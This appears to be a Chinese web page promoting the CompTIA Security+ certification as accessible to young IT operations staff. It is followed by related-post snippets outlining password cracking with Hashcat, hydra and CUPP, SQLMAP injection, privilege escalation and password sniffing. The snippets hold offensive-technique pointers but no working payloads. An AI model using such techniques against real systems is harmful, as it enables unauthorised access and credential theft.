目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
【安全牛学习笔记】离线密码破解、离线密码破解-Hashcat相关推荐
- 【安全牛学习笔记】字典、在线密码破解-hydra
字典 按个人信息生成其专属的密码字典 CUPP: Common User Password Profiler - git clone https://github.com/Mebus/cupp.git ...
- Kali linux 学习笔记(六十一)密码破解——离线破解(Hashcat、oclhashcat、RainbowCrack、John) 2020.4.6
前言 本节学习离线破解 其实就是HASH破解 1.简介 身份认证 应明确禁止明文传输密码 每次认证使用HASH算法加密密码传输(HASH算法加密容易.解密困难) 服务器端用户数据库应加密保存 破解思路 ...
- 【安全牛学习笔记】SQLMAP- 自动注入
课时92 SQLMAP- 自动注入 SQLMAP自动注入 开源sql注入漏洞检测.利用工具 检测动态页面中get/post参数.cookie.http头 数据榨取 文件系统访问 操作系统命令执行 引擎 ...
- 【安全牛学习笔记】手动漏洞挖掘(二)
手动漏洞挖掘 身份认证 常用弱口令/基于字典的密码破爆破 锁定账号 信息收集 手机号 密码错误提示信息 密码嗅探 手动漏洞挖掘 会话sessionID Xss / cookie importer Se ...
- 【安全牛学习笔记】提权
Windows • user • Administrator • System Linux • User • Root windows提权 将admin提权为system net user命令 查看 ...
- 【安全牛学习笔记】思路、身份认证方法、密码破解方法、字典
思路 目标系统实施了强安全措施 - 安装了所有补丁 - 无任何已知漏洞 - 无应用层漏洞 - ***面最小化 社会工程学 获取目标系统用户身份 - 非授权用户不守信,认证用户可以访问守信资源 - 已有 ...
- 【安全牛学习笔记】COWPATTY 破解密码
HTTP://ETUORLASLS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/ ╋━━━━━━━━━━━━━ ...
- 【安全牛学习笔记】密码嗅探
密码嗅探 二.三层地址 - IP网络到网络 - MAC主机到主机 交换机与HUB - HUB全端口转发 - 交换机根据学习地址转发 - 混杂模式抓包 [课外拓展]局域网密码嗅探器,只需在自己的电脑上运 ...
- Mapbox Android学习笔记(8)离线地图
Offline 通常,您可能会发现您的用户群大部分时间都不在网格上.Maps SDK允许您下载和存储预先选择的区域,以便在设备脱机时使用.下载地图的结果是使用下载区域内的style.tile和其他资源 ...
最新文章
- iOS布局-autoresizingMask
- Android TextView文本处理库推荐
- 带缓冲的I/O操作和不带缓冲的I/O操作
- OpenCV各向异性图像分割anisotropic image segmentation的实例(附完整代码)
- 你若安好,便是晴天。
- 前端学习(1576):项目骨架
- 指针选择排序法,10个整数从小到大排序
- code128java字符_java相关:如何使用Code128字体将文本转换为code128条形码
- 设置 phpstorm 左侧文件自动定位到当前编辑的文件
- 常见的十二种逻辑谬误
- 基于MATLAB的机器人学、机器视觉与控制
- Linux禁用scp和sftp
- CentOS 7:设置静态/动态ip地址
- 哪些东西做引流产品比较好?哪些商品是每天比较受欢迎的?
- jzoj 5850.【NOIP提高组模拟2018.8.25】e 可持久化线段树+lca
- 2016年智能楼宇趋势展望
- ESP8266环境搭建-ESP8266_RTOS_SDK(超详细)
- 145.7. Miscellaneous
- 移动硬盘读不出来怎么办?试试这么做!
- 拆解 米家扫地机器人_小米米家机器人值得买吗?小米米家扫地机器人拆解图解...